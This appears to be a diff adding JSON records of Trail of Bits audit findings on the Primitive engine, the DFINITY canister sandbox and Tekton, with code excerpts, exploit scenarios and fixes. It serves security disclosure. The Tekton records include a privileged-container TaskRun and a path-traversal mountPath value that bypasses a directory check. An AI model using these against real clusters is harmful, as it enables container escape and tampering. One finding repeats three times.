balanceEngineRiskyBefore = risky.balanceOf( address (engine)); uint256 balanceEngineStableBefore = stable.balanceOf( address (engine)); ( bool success , ) = address (engine).call( abi.encodeWithSignature( \"withdraw(address,uint256,uint256)\" , recipient, delRisky, delStable) ); if (!success) { assert( false ); return ; } { assert_post_withdrawal(precallSender, precallRecipient, recipient, delRisky, delStable); //check token balances uint256 balanceRecipientRiskyAfter = risky.balanceOf(recipient); uint256 balanceRecipientStableAfter = stable.balanceOf(recipient); uint256 balanceEngineRiskyAfter = risky.balanceOf( address (engine)); uint256 balanceEngineStableAfter = stable.balanceOf( address (engine)); emit DepositWithdraw( \"balance recip risky\" , balanceRecipientRiskyBefore, balanceRecipientRiskyAfter, delRisky); emit DepositWithdraw( \"balance recip stable\" , balanceRecipientStableBefore, balanceRecipientStableAfter, delStable); emit DepositWithdraw( \"balance engine risky\" , balanceEngineRiskyBefore, balanceEngineRiskyAfter, delRisky); emit DepositWithdraw( \"balance engine stable\" , balanceEngineStableBefore, balanceEngineStableAfter, delStable); assert(balanceRecipientRiskyAfter == balanceRecipientRiskyBefore + delRisky); assert(balanceRecipientStableAfter == balanceRecipientStableBefore + delStable); assert(balanceEngineRiskyAfter == balanceEngineRiskyBefore - delRisky); assert(balanceEngineStableAfter == balanceEngineStableBefore - delStable); } } Figure 14.2:
rmm-core/contracts/crytic/E2E_Deposit_Withdrawal.sol withdraw_with_safe_range(address,uint256,uint256): failed! Call sequence: deposit_with_safe_range(0xa329c0648769a73afac7f9381e08fb43dbea72,115792089237316195423570985008687907853269984665640564039447584007913129639937,59643239765395994101807073177593948704321625682232592596462650205581096120955) from: 0x1E2F9E10D02a6b8F8f69fcBf515e75039D2EA30d withdraw_with_safe_range(0x48bacb9266a570d521063ef5dd96e61686dbe788,5248038478797710845,748) from: 0x6A4A62E5A7eD13c361b176A5F62C2eE620Ac0DF8 Event sequence: Panic(1), Transfer(5248038478797710846), Transfer(749), Withdraw(5248038478797710846, 749), DepositWithdraw(\"sender risky\", 8446744073709551632, 3198705594911840786, 5248038478797710846), DepositWithdraw(\"sender stable\", 15594018607531992466, 15594018607531991717, 749), DepositWithdraw(\"balance recip risky\", 8446744073709551632, 8446744073709551632, 5248038478797710846), DepositWithdraw(\"balance recip stable\", 15594018607531992466, 15594018607531992466, 749), DepositWithdraw(\"balance engine risky\", 8446744073709551632, 8446744073709551632, 5248038478797710846), DepositWithdraw(\"balance engine stable\", 15594018607531992466, 15594018607531992466, 749) Figure 14.3: Echidna results Exploit Scenario Alice, a user, withdraws her funds from the Primitive engine. She accidentally specifies the address of the recipient as the engine address, and her funds are left stuck in the contract. Recommendations Short term, add a check preventing withdrawals directly to the engine address so that users are protected from this mistake. Long term, use Echidna to test system and mathematical invariants.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "1. The canister sandbox has vulnerable dependencies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "The canister sandbox codebase uses the following vulnerable or unmaintained Rust dependencies. (All of the crates listed are indirect dependencies of the codebase.)", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "2. Complete environment of the replica is passed to the sandboxed process ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "When the spawn_socketed_process function spawns a new sandboxed process, the call to the Command::spawn method passes the entire environment of the replica to the sandboxed process. pub fn spawn_socketed_process( exec_path: &str, argv: &[String], socket: RawFd, ) -> std::io::Result { let mut cmd = Command::new(exec_path); cmd.args(argv); // In case of Command we inherit the current process's environment. This should // particularly include things such as Rust backtrace flags. It might be // advisable to filter/configure that (in case there might be information in // env that the sandbox process should not be privy to). // The following block duplicates sock_sandbox fd under fd 3, errors are // handled. unsafe { cmd.pre_exec(move || { let fd = libc::dup2(socket, 3); if fd != 3 { return Err(std::io::Error::last_os_error()); } Ok(()) }) }; let child_handle = cmd.spawn()?; Ok(child_handle) } Figure 2.1: canister_sandbox/common/src/process.rs:17- The DFINITY team does not use environment variables for sensitive information. However, sharing the environment with the sandbox introduces a latent risk that system configuration data or other sensitive data could be leaked to the sandboxed process in the future. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. Since the environment of the replica was leaked to the sandbox when the process was created, the canister gains information about the system that it is running on and learns sensitive information passed as environment variables to the replica, making further efforts to compromise the system easier. Recommendations Short term, add code that filters the environment passed to the sandboxed process (e.g., Command::env_clear or Command::env_remove) to ensure that no sensitive information is leaked if the sandbox is compromised.
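The fix named in the report is Rust's Command::env_clear/env_remove; as a language-neutral sketch of the same idea in Go (all names illustrative), spawn the child with an explicitly allowlisted environment instead of inheriting the parent's:

package main

import (
    \"os\"
    \"os/exec\"
)

// spawnSandbox starts the sandbox binary with an explicit, minimal
// environment rather than inheriting the parent's. Only allowlisted
// variables are forwarded; everything else is dropped.
func spawnSandbox(path string, args []string) (*exec.Cmd, error) {
    cmd := exec.Command(path, args...)
    cmd.Env = []string{} // start from an empty environment
    for _, key := range []string{\"RUST_BACKTRACE\"} { // example allowlist
        if v, ok := os.LookupEnv(key); ok {
            cmd.Env = append(cmd.Env, key+\"=\"+v)
        }
    }
    return cmd, cmd.Start()
}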
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. SELinux policy allows the sandbox process to write replica log messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "When a new sandboxed process is spawned using Command::spawn, the process's stdin, stdout, and stderr file descriptors are inherited from the parent process. The SELinux policy for the canister sandbox currently allows sandboxed processes to read from and write to all file descriptors inherited from the replica (the file descriptors created by init when the replica is started, as well as the file descriptor used for interprocess RPC). As a result, a compromised sandbox could spoof log messages to the replica's stdout or stderr. # Allow to use the logging file descriptor inherited from init. # This should actually not be allowed, logs should be routed through # replica. allow ic_canister_sandbox_t init_t : fd { use }; allow ic_canister_sandbox_t init_t : unix_stream_socket { read write }; Figure 3.1: guestos/rootfs/prep/ic-node/ic-node.te:312-316 Additionally, sandboxed processes' read and write access to files with the tmpfs_t context appears to be overly broad, but considering the fact that sandboxed processes are not allowed to open files, we did not see any way to exploit this. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. By writing fake log messages to the replica's stderr file descriptor, the canister makes it look like the replica has other issues, masking the compromise and making incident response more difficult. Recommendations Short term, change the SELinux policy to disallow sandboxed processes from reading from and writing to the inherited file descriptors stdin, stdout, and stderr.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "4. Canister sandbox system calls are not filtered using Seccomp ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "Seccomp provides a framework to filter outgoing system calls. Using Seccomp, a process can limit the type of system calls available to it, thereby limiting the available attack surface of the kernel. The current implementation of the canister sandbox does not use Seccomp; instead, it relies on mandatory access controls (via SELinux) to restrict the system calls available to a sandboxed process. While SELinux is useful for restricting access to files, directories, and other processes, Seccomp provides more fine-grained control over kernel system calls and their arguments.
For this reason, Seccomp (in particular, Seccomp-BPF) is a useful complement to SELinux in restricting a sandboxed process's access to the system. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. By exploiting a vulnerability in the kernel, it is able to break out of the sandbox and execute arbitrary code on the node. Recommendations Long term, consider using Seccomp-BPF to restrict the system calls available to a sandboxed process. Extra care must be taken when the canister sandbox (or any of its dependencies) is updated to ensure that the set of system calls invoked during normal execution has not changed.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "5. Invalid system state changes cause the replica to panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "When a sandboxed process has completed an execution request, the hypervisor calls SystemStateChanges::apply_changes (in Hypervisor::execute) to apply the system state changes to the global canister system state. pub fn apply_changes(self, system_state: &mut SystemState) { // Verify total cycle change is not positive and update cycles balance. assert!(self.cycle_change_is_valid( system_state.canister_id == CYCLES_MINTING_CANISTER_ID )); self.cycles_balance_change .apply_ref(system_state.balance_mut()); // Observe consumed cycles. system_state .canister_metrics .consumed_cycles_since_replica_started += NominalCycles::from_cycles(self.cycles_consumed); // Verify we don't accept more cycles than are available from each call // context and update each call context balance if !self.call_context_balance_taken.is_empty() { let call_context_manager = system_state.call_context_manager_mut().unwrap(); for (context_id, amount_taken) in &self.call_context_balance_taken { let call_context = call_context_manager .call_context_mut(*context_id) .expect(\"Canister accepted cycles from invalid call context\"); call_context .withdraw_cycles(*amount_taken) .expect(\"Canister accepted more cycles than available ...\"); } } // Push outgoing messages. for msg in self.requests { system_state .push_output_request(msg) .expect(\"Unable to send new request\"); } // Verify new certified data isn't too long and set it. if let Some(certified_data) = self.new_certified_data.as_ref() { assert!(certified_data.len() <= CERTIFIED_DATA_MAX_LENGTH as usize); system_state.certified_data = certified_data.clone(); } // Verify callback ids and register new callbacks. for update in self.callback_updates { match update { CallbackUpdate::Register(expected_id, callback) => { let id = system_state .call_context_manager_mut() .unwrap() .register_callback(callback); assert_eq!(id, expected_id); } CallbackUpdate::Unregister(callback_id) => { let _callback = system_state .call_context_manager_mut() .unwrap() .unregister_callback(callback_id) .expect(\"Tried to unregister callback with an id ...\"); } } } } Figure 5.1: system_api/src/sandbox_safe_system_state.rs:99-157 The apply_changes method uses assert and expect to ensure that system state invariants involving cycle balances, call contexts, and callback updates are upheld. By sending a WebAssembly (Wasm) execution output with invalid system state changes, a compromised sandboxed process could use this to cause the replica to panic. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. The canister sends a Wasm execution output message containing invalid state changes to the replica, which causes the replica process to panic, crashing the entire subnet. Recommendations Short term, revise SystemStateChanges::apply_changes so that it returns an error if the system state changes from a sandboxed process are found to be invalid. Long term, audit the codebase for the use of panicking functions and macros like assert, unreachable, unwrap, or expect in code that validates data from untrusted sources.
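The recommendation (returning an error from apply_changes rather than asserting) is Rust-specific; as a schematic, language-neutral sketch of the same validate-then-apply pattern in Go, with all types and limits invented for illustration:

package main

import \"fmt\"

// StateChanges is an invented stand-in for the changes a sandbox reports.
type StateChanges struct {
    CycleDelta    int64
    CertifiedData []byte
}

const maxCertifiedDataLen = 32 // illustrative limit

// applyChanges validates untrusted input and returns an error instead of
// panicking, so one malicious sandbox cannot crash the whole process.
func applyChanges(c StateChanges) error {
    if c.CycleDelta > 0 {
        return fmt.Errorf(\"invalid state change: positive cycle delta %d\", c.CycleDelta)
    }
    if len(c.CertifiedData) > maxCertifiedDataLen {
        return fmt.Errorf(\"certified data too long: %d bytes\", len(c.CertifiedData))
    }
    // ... apply the validated changes here ...
    return nil
}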
", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "6. SandboxedExecutionController does not enforce memory size invariants ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "When a sandboxed process has completed an execution request, the execution state is updated by the SandboxedExecutionController::process method with the data from the execution output. // Unless execution trapped, commit state (applying execution state // changes, returning system state changes to caller). let system_state_changes = if exec_output.wasm.wasm_result.is_ok() { if let Some(state_modifications) = exec_output.state { // TODO: If a canister has broken out of wasm then it might have allocated // more wasm or stable memory than allowed. We should add an additional // check here that the canister is still within its allowed memory usage. execution_state .wasm_memory .page_map .deserialize_delta(state_modifications.wasm_memory.page_delta); execution_state.wasm_memory.size = state_modifications.wasm_memory.size; execution_state.wasm_memory.sandbox_memory = SandboxMemory::synced( wrap_remote_memory(&sandbox_process, next_wasm_memory_id), ); execution_state .stable_memory .page_map .deserialize_delta(state_modifications.stable_memory.page_delta); execution_state.stable_memory.size = state_modifications.stable_memory.size; execution_state.stable_memory.sandbox_memory = SandboxMemory::synced( wrap_remote_memory(&sandbox_process, next_stable_memory_id), ); // ... state_modifications.system_state_changes } else { SystemStateChanges::default() } } else { SystemStateChanges::default() }; Figure 6.1: replica_controller/src/sandboxed_execution_controller.rs:663 However, the code does not validate the Wasm and stable memory sizes against the corresponding page maps. This means that a compromised sandbox could report a Wasm or stable memory size of 0 along with a non-empty page map. Since these memory sizes are used to calculate the total memory used by the canister in ExecutionState::memory_usage, this lack of validation could allow the canister to use up cycles normally reserved for memory use. pub fn memory_usage(&self) -> NumBytes { // We use 8 bytes per global. let globals_size_bytes = 8 * self.exported_globals.len() as u64; let wasm_binary_size_bytes = self.wasm_binary.binary.len() as u64; num_bytes_try_from(self.wasm_memory.size) .expect(\"could not convert from wasm memory number of pages to bytes\") + num_bytes_try_from(self.stable_memory.size) .expect(\"could not convert from stable memory number of pages to bytes\") + NumBytes::from(globals_size_bytes) + NumBytes::from(wasm_binary_size_bytes) } Figure 6.2: replicated_state/src/canister_state/execution_state.rs:411-421 Canister memory usage affects how much the cycles account manager charges the canister for resource allocation.
If the canister uses best-effort memory allocation, the implementation calls through to ExecutionState::memory_usage to compute how much memory the canister is using. pub fn charge_canister_for_resource_allocation_and_usage( &self, log: &ReplicaLogger, canister: &mut CanisterState, duration_between_blocks: Duration, ) -> Result<(), CanisterOutOfCyclesError> { let bytes_to_charge = match canister.memory_allocation() { // The canister has explicitly asked for a memory allocation. MemoryAllocation::Reserved(bytes) => bytes, // The canister uses best-effort memory allocation. MemoryAllocation::BestEffort => canister.memory_usage(self.own_subnet_type), }; if let Err(err) = self.charge_for_memory( &mut canister.system_state, bytes_to_charge, duration_between_blocks, ) { } // ... // ... } Figure 6.3: cycles_account_manager/src/lib.rs:671 Thus, if a sandboxed process reports a lower memory usage, the cycles account manager will charge the canister less than it should. It is unclear whether this represents expected behavior when a canister breaks out of the Wasm execution environment. Clearly, if the canister is able to execute arbitrary code in the context of a sandboxed process, then the replica has lost all ability to meter and restrict canister execution, which means that accounting for canister cycle and memory use is largely meaningless. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. The canister reports the wrong memory sizes back to the replica with the execution output. This causes the cycles account manager to miscalculate the remaining available cycles for the canister in the charge_canister_for_resource_allocation_and_usage method. Recommendations Short term, document this behavior and ensure that implicitly trusting the canister output could not adversely affect the replica or other canisters running on the system. Consider enforcing the correct invariants for memory allocations reported by a sandboxed process. The following invariant should always hold for Wasm and stable memory: page_map_size <= memory.size <= MAX_SIZE page_map_size could be computed as memory.page_map.num_host_pages() * PAGE_SIZE.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "1. The use of time.After() in select statements can lead to memory leaks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Calls to time.After in for/select statements can lead to memory leaks because the garbage collector does not clean up the underlying Timer object until the timer fires. A new timer, which requires resources, is initialized at each iteration of the for loop (and, hence, the select statement). As a result, many routines originating from the time.After call could lead to overconsumption of memory. for { select { case <-ctx.Done(): // When the context is cancelled, stop reporting. return case <-time.After(r.ReportingPeriod): // Every 30s surface a metric for the number of running pipelines. if err := r.RunningPipelineRuns(lister); err != nil { logger.Warnf(\"Failed to log the metrics : %v\", err) } Figure 1.1: tektoncd/pipeline/pkg/pipelinerunmetrics/metrics.go#L290-L300 for { select { case <-ctx.Done(): // When the context is cancelled, stop reporting. return case <-time.After(r.ReportingPeriod): // Every 30s surface a metric for the number of running tasks. if err := r.RunningTaskRuns(lister); err != nil { logger.Warnf(\"Failed to log the metrics : %v\", err) } } Figure 1.2: pipeline/pkg/taskrunmetrics/metrics.go#L380-L391 Exploit Scenario An attacker finds a way to overuse a function, which leads to overconsumption of memory and causes Tekton Pipelines to crash. Recommendations Short term, consider refactoring the code that uses the time.After function in for/select loops to use tickers. This will prevent memory leaks and crashes caused by memory exhaustion. Long term, ensure that the time.After method is not used in for/select routines. Periodically use the Semgrep query to check for and detect similar patterns. References Use with caution time.After Can cause memory leak (golang) Golang <-time.After() is not garbage collected before expiry
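As a sketch of the recommended ticker-based refactor (a fragment reusing the identifiers from figure 1.1, not a self-contained program):

// One ticker is allocated up front and released via defer, instead of a
// new timer being allocated on every loop iteration.
ticker := time.NewTicker(r.ReportingPeriod)
defer ticker.Stop()
for {
    select {
    case <-ctx.Done():
        // When the context is cancelled, stop reporting.
        return
    case <-ticker.C:
        // Every 30s surface a metric for the number of running pipelines.
        if err := r.RunningPipelineRuns(lister); err != nil {
            logger.Warnf(\"Failed to log the metrics : %v\", err)
        }
    }
}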
", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "2. Risk of resource exhaustion due to the use of defer inside a loop ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The ExecuteInterceptors function runs all interceptors configured for a given trigger inside a loop. The res.Body.Close() function is deferred at the end of the loop. Calling defer inside a loop could cause resource exhaustion conditions because the deferred function is called when the enclosing function exits, not at the end of each loop iteration. As a result, resources from each interceptor object accumulate until the end of the for statement. While this may not cause noticeable issues in the current state of the application, it is best to call res.Body.Close() at the end of each iteration to prevent unforeseen issues. func (r Sink) ExecuteInterceptors(trInt []*triggersv1.TriggerInterceptor, in *http.Request, event []byte, log *zap.SugaredLogger, eventID string, triggerID string, namespace string, extensions map[string]interface{}) ([]byte, http.Header, *triggersv1.InterceptorResponse, error) { if len(trInt) == 0 { return event, in.Header, nil, nil } // (...) for _, i := range trInt { if i.Webhook != nil { // Old style interceptor // (...) defer res.Body.Close() Figure 2.1: triggers/pkg/sink/sink.go#L428-L469 Recommendations Short term, rather than deferring the call to res.Body.Close(), add a call to res.Body.Close() at the end of the loop.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Lack of access controls for Tekton Pipelines API ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The Tekton Pipelines extension uses an API to process requests for various tasks such as listing namespaces and creating TaskRuns. While Tekton provides documentation on enabling OAuth2 authentication, the API is unauthenticated by default. Should a Tekton operator expose the dashboard for other users to monitor their own deployments, every API method would be available to them, allowing them to perform tasks on namespaces that they do not have access to. Figure 3.1: Successful unauthenticated request Exploit Scenario An attacker discovers the endpoint exposing the Tekton Pipelines API and uses it to perform destructive tasks such as deleting PipelineRuns. Furthermore, the attacker can discover potentially sensitive information pertaining to deployments configured in Tekton. Recommendations Short term, add documentation on securing access to the API using Kubernetes security controls, including explicit documentation on the security implications of exposing access to the dashboard and, therefore, the API. Long term, add an access control mechanism for controlling who can access the API and limiting access to namespaces as needed and/or possible.
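One possible shape for such an access control layer, sketched in Go with net/http (the bearer-token source and comparison are simplified placeholders, not Tekton's design; a real deployment would integrate Kubernetes RBAC or OIDC):

package main

import (
    \"crypto/subtle\"
    \"net/http\"
    \"os\"
)

// requireToken is a sketch of an access-control middleware: every API
// request must carry a bearer token. The environment-variable token source
// is a placeholder for illustration only.
func requireToken(next http.Handler) http.Handler {
    expected := \"Bearer \" + os.Getenv(\"DASHBOARD_API_TOKEN\")
    return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        got := r.Header.Get(\"Authorization\")
        if subtle.ConstantTimeCompare([]byte(got), []byte(expected)) != 1 {
            http.Error(w, \"unauthorized\", http.StatusUnauthorized)
            return
        }
        next.ServeHTTP(w, r)
    })
}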
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Lack of access controls for Tekton Pipelines API ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The Tekton Pipelines extension uses an API to process requests for various tasks such as listing namespaces and creating TaskRuns. While Tekton provides documentation on enabling OAuth2 authentication, the API is unauthenticated by default. Should a Tekton operator expose the dashboard for other users to monitor their own deployments, every API method would be available to them, allowing them to perform tasks on namespaces that they do not have access to. Figure 3.1: Successful unauthenticated request Exploit Scenario An attacker discovers the endpoint exposing the Tekton Pipelines API and uses it to perform destructive tasks such as deleting PipelineRuns. Furthermore, the attacker can discover potentially sensitive information pertaining to deployments configured in Tekton. Recommendations Short term, add documentation on securing access to the API using Kubernetes security controls, including explicit documentation on the security implications of exposing access to the dashboard and, therefore, the API. Long term, add an access control mechanism for controlling who can access the API and limiting access to namespaces as needed and/or possible.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] + }, + { + "title": "5. Missing validation of Origin header in WebSocket upgrade requests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Tekton Dashboard uses the WebSocket protocol to provide real-time updates for TaskRuns, PipelineRuns, and other Tekton data. The endpoints responsible for upgrading the incoming HTTP request to a WebSocket request do not validate the Origin header to ensure that the request is coming from a trusted origin (i.e., the dashboard itself). As a result, arbitrary malicious web pages can connect to Tekton Dashboard and receive these real-time updates, which may include sensitive information, such as the log output of TaskRuns and PipelineRuns. Exploit Scenario A user hosts Tekton Dashboard on a private address, such as one in a local area network or a virtual private network (VPN), without enabling application-layer authentication. An attacker identifies the URL of the dashboard instance (e.g., http://192.168.3.130:9097) and hosts a web page with the following content: Figure 5.1: A malicious web page that extracts Tekton Dashboard WebSocket updates The attacker convinces the user to visit the web page. Upon loading it, the user's browser successfully connects to the Tekton Dashboard WebSocket endpoint for monitoring PipelineRuns and logs received messages to the JavaScript console. As a result, the attacker's untrusted web origin now has access to real-time updates from a dashboard instance on a private network that would otherwise be inaccessible outside of that network. Figure 5.2: The untrusted origin http://localhost:8080 has access to Tekton Dashboard WebSocket messages. Recommendations Short term, modify the code so that it verifies that the Origin header of WebSocket upgrade requests corresponds to the trusted origin on which Tekton Dashboard is served. For example, if the origin is not http://192.168.3.130:9097, Tekton Dashboard should reject the incoming request.
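A minimal sketch of such a check, assuming a gorilla/websocket-style Upgrader; the trusted origin below reuses the example address from the exploit scenario, and a real dashboard would derive it from its own configuration rather than a constant:

package dashboard

import (
	"net/http"

	"github.com/gorilla/websocket"
)

const trustedOrigin = "http://192.168.3.130:9097" // example address from the finding

// upgrader refuses the handshake when the Origin header does not match
// the origin the dashboard itself is served on; gorilla/websocket replies
// with HTTP 403 when CheckOrigin returns false.
var upgrader = websocket.Upgrader{
	CheckOrigin: func(r *http.Request) bool {
		return r.Header.Get("Origin") == trustedOrigin
	},
}

func handleUpdates(w http.ResponseWriter, r *http.Request) {
	conn, err := upgrader.Upgrade(w, r, nil)
	if err != nil {
		return // upgrade rejected: untrusted origin or handshake error
	}
	defer conn.Close()
	// ... stream TaskRun/PipelineRun updates to the trusted client ...
}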
", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "8. Tekton allows users to create privileged containers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Tekton allows users to define task and sidecar objects with a privileged security context, which effectively grants task containers all capabilities. Tekton operators can use admission controllers to disallow users from using this option. However, information on this mitigation in the guidance documents for Tekton Pipelines is insufficient and should be made clear. If an attacker gains code execution on any of these containers, the attacker could break out of it and gain full access to the host machine. We were not able to escape step containers running in privileged mode during the time allotted for this audit. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: build-push-secret-10 spec: serviceAccountName: build-bot taskSpec: steps: - name: secret securityContext: privileged: true image: ubuntu script: | #!/usr/bin/env bash sleep 20m Figure 8.1: TaskRun definition with the privileged security context root@build-push-secret-10-pod:/proc/fs# find -type f -maxdepth 5 -writable find: warning: you have specified the global option -maxdepth after the argument -type, but global options are not positional, i.e., -maxdepth affects tests specified before it as well as those specified after it. Please specify global options before other arguments. ./xfs/xqm ./xfs/xqmstat ./cifs/Stats ./cifs/cifsFYI ./cifs/dfscache ./cifs/traceSMB ./cifs/DebugData ./cifs/open_files ./cifs/SecurityFlags ./cifs/LookupCacheEnabled ./cifs/LinuxExtensionsEnabled ./ext4/vda1/fc_info ./ext4/vda1/options ./ext4/vda1/mb_groups ./ext4/vda1/es_shrinker_info ./jbd2/vda1-8/info ./fscache/stats Figure 8.2: With the privileged security context in figure 8.1, it is now possible to write to several files in /proc/fs, for example. Exploit Scenario A malicious developer runs a TaskRun with a privileged security context and obtains shell access to the container. Using one of various known exploits, he breaks out of the container and gains root access on the host. Recommendations Short term, create clear, easy-to-locate documentation warning operators about allowing developers and other users to define a privileged security context for step containers, and include guidance on how to restrict such a feature.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "11. Lack of rate-limiting controls ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Tekton Dashboard does not enforce rate limiting of HTTP requests. As a result, we were able to issue over a thousand requests in just over a minute. Figure 11.1: We sent over a thousand requests to Tekton Dashboard without being rate limited. Processing requests sent at such a high rate can consume an inordinate amount of resources, increasing the risk of denial-of-service attacks through excessive resource consumption. In particular, we were able to create hundreds of running import resources pods that were able to consume nearly all the host's memory in the span of a minute. Exploit Scenario An attacker floods a Tekton Dashboard instance with HTTP requests that execute pipelines, leading to a denial-of-service condition. Recommendations Short term, implement rate limiting on all API endpoints. Long term, run stress tests to ensure that the rate limiting enforced by Tekton Dashboard is robust.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "12. Lack of maximum request and response body constraint ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The ioutil.ReadAll function reads from a source until an error or an end-of-file (EOF) condition occurs, at which point it returns the data that it read. This function is used in different files of the Tekton Triggers and Tekton Pipelines codebases to read requests and responses.
There is no limit on the maximum size of request and response bodies, so using ioutil.ReadAll to parse requests and responses could cause a denial of service (due to insufficient memory). A denial of service could also occur if a resource-exhausting input is loaded multiple times. This method is used in the following locations of the codebase (file / project): pkg/remote/oci/resolver.go:L211 (Pipelines); pkg/sink/sink.go:147,465 (Triggers); pkg/interceptors/webhook/webhook.go:77 (Triggers); pkg/interceptors/interceptors.go:176 (Triggers); pkg/sink/validate_payload.go:29 (Triggers); cmd/binding-eval/cmd/root.go:141 (Triggers); cmd/triggerrun/cmd/root.go:182 (Triggers). Recommendations Short term, place a limit on the maximum size of request and response bodies. For example, this limit can be implemented by using the io.LimitReader function. Long term, place limits on request and response bodies globally in other places within the application to prevent denial-of-service attacks.
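A minimal sketch of the io.LimitReader approach; the 1 MiB limit is an illustrative value, not one taken from the Tekton codebase:

package sink

import (
	"io"
	"net/http"
)

const maxBodyBytes = 1 << 20 // 1 MiB: an illustrative per-request cap

// readBounded reads at most maxBodyBytes from the request body, so an
// attacker-supplied body of arbitrary size cannot exhaust memory the way
// an unbounded ioutil.ReadAll call can.
func readBounded(r *http.Request) ([]byte, error) {
	return io.ReadAll(io.LimitReader(r.Body, maxBodyBytes))
}

For server-side handlers, http.MaxBytesReader is a close alternative: beyond the limit it returns a non-EOF error so the handler can reject the request outright.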
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Lack of access controls for Tekton Pipelines API ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The Tekton Pipelines extension uses an API to process requests for various tasks such as listing namespaces and creating TaskRuns. While Tekton provides documentation on enabling OAuth2 authentication, the API is unauthenticated by default. Should a Tekton operator expose the dashboard for other users to monitor their own deployments, every API method would be available to them, allowing them to perform tasks on namespaces that they do not have access to. Figure 3.1: Successful unauthenticated request Exploit Scenario An attacker discovers the endpoint exposing the Tekton Pipelines API and uses it to perform destructive tasks such as deleting PipelineRuns. Furthermore, the attacker can discover potentially sensitive information pertaining to deployments configured in Tekton. Recommendations Short term, add documentation on securing access to the API using Kubernetes security controls, including explicit documentation on the security implications of exposing access to the dashboard and, therefore, the API. Long term, add an access control mechanism for controlling who can access the API and limiting access to namespaces as needed and/or possible.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] + }, + { + "title": "4. Insufficient validation of volumeMounts paths ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The Tekton Pipelines extension performs a number of validations against task steps whenever a task is submitted for Tekton to process. One such validation verifies that the path for a volume mount is not inside the /tekton directory. This directory is treated as a special directory by Tekton, as it is used for Tekton-specific functionality. However, the extension uses strings.HasPrefix to verify that MountPath does not contain the string /tekton/ without first sanitizing it. As a result, it is possible to create volume mounts inside /tekton by using path traversal strings such as /somedir/../tekton/newdir in the volumeMounts variable of a task step definition. for j, vm := range s.VolumeMounts { if strings.HasPrefix(vm.MountPath, \"/tekton/\") && !strings.HasPrefix(vm.MountPath, \"/tekton/home\") { errs = errs.Also(apis.ErrGeneric(fmt.Sprintf(\"volumeMount cannot be mounted under /tekton/ (volumeMount %q mounted at %q)\", vm.Name, vm.MountPath), \"mountPath\").ViaFieldIndex(\"volumeMounts\", j)) } if strings.HasPrefix(vm.Name, \"tekton-internal-\") { errs = errs.Also(apis.ErrGeneric(fmt.Sprintf(`volumeMount name %q cannot start with \"tekton-internal-\"`, vm.Name), \"name\").ViaFieldIndex(\"volumeMounts\", j)) } } Figure 4.1: pipeline/pkg/apis/pipeline/v1beta1/task_validation.go#L218-L226 The YAML file in the figure below was used to create a volume in the reserved /tekton directory. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: vol-test spec: taskSpec: steps: - image: docker name: client workingDir: /workspace script: | #!/usr/bin/env sh sleep 15m volumeMounts: - mountPath: /certs/client/../../../tekton/mytest name: empty-path volumes: - name: empty-path emptyDir: {} Figure 4.2: Task run file used to create a volume mount inside an invalid location The figure below demonstrates that the previous file successfully created the mytest directory inside of the /tekton directory by using a path traversal string. $ kubectl exec -i -t vol-test -- /bin/sh Defaulted container \"step-client\" out of: step-client, place-tools (init), step-init (init), place-scripts (init) 